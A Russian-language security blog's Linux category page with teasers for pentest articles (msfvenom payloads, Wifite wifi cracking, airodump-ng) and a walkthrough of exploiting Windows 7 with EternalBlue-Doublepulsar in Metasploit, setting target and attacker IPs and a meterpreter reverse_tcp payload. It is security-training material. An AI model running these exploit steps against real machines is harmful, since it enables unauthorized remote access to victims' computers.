Рубрика: Linux

Здесь все статьи по linux

msfvenom

Как создать пэйлоад с помощью msfvenom

Для того, чтобы эффективно бороться с компьютерными угрозами, надо знать своих врагов. Среди таких врагов — программы, которые позволяют незаметно подключаться к компьютеру и выполнять с ним некие действия. Зная

W3af аудит уязвимостей

Что такое W3af W3af – это платформа, основанная на графическом интерфейсе, которая помогает в аудите и выявлении уязвимостей в веб-приложениях. Данный инструмент загружен рядом полезных плагинов, которые могут сканировать веб-сайт

Тулкиты для пентеста

Тулкиты для Пентестинга

Здесь представлены лучшие утилиты для пентестинга. RC Exploiter Необычный инструмент для брутфорса, а необычный он тем, что его нужно сначала крякнуть, что бы использовать 🙂 (или как говорят создатели этого

puttygen

Ssh — настройка авторизации по сертификату

Авторизация по сертификату усилит безопасность вашего сервера, так как пароль перехватить можно, а сертификат — нет. Сегодня я покажу, как быстро и просто сделать ssh сертификат, который будет работать в

Parrot os

Parrot Security OS

Parrot Security OS (или ParrotSec) — дистрибутив Linux, основан на Debian с упором на компьютерную безопасность. Предназначен для тестирования системы на проникновение, оценки уязвимостей и ликвидации их последствий, компьютерной криминалистики и

airodump-ng

airodump-ng — полезные ключи

airodump-ng содержит немного ключей, они позволяют отфильтровать сети по каналам и по протоколам, также позволяют логировать полученные данные. Ключи airodump-ng: —wps Показывает версию wps -M Показывает производителя, если он есть

Как взломать wifi при помощи Wifite

Я расскажу вам, как пользоваться данным тулкитом. Wifite предустановлен в Kali Linux. Я рекомендую его обновить: apt install wifite Запускаем тулкит: wifite (Можно использовать ключ —wps, для отображения только точек

windows 7 взлом

Взлом windows 7 при помощи эксплоита EternalBlue

Сегодня мы будем использовать эксплоит EternalBlue Doublepulsar для взлома Windows 7

Для того чтобы EternalBlue заработал нужно скачать дополнения по этой ссылке и распаковать именно в root (Там же будет сам эксплоит, перетащите его в /usr/share/Metasploit-Framework/modules/exploit/windows/smb/), а так же установить/обновить wine, чтобы появились файлы wine в root.

Приступим к тестированию безопасности windows 7:

Запускаем metasploit:

msfconsole

Выбираем эксплоит:

use exploit/windows/smb/EternalBlue-Doublepulsar

Вводим IP адрес цели:

set RHOST <ip>

Вводим свой IP:

set LHOST <IP>

Выбираем архитектуру системы конечного компьютера (не обязательно):

set targetarchitecture <x32/x64>

Выбираем полезную нагрузку (payload) (можно любой, он будет загружен и активирован):

set payload <Ex:windows/x64/meterpreter/reverse_tcp>

it assasin cможет принять любую посещаемость благодаря кешированию WP Super Cache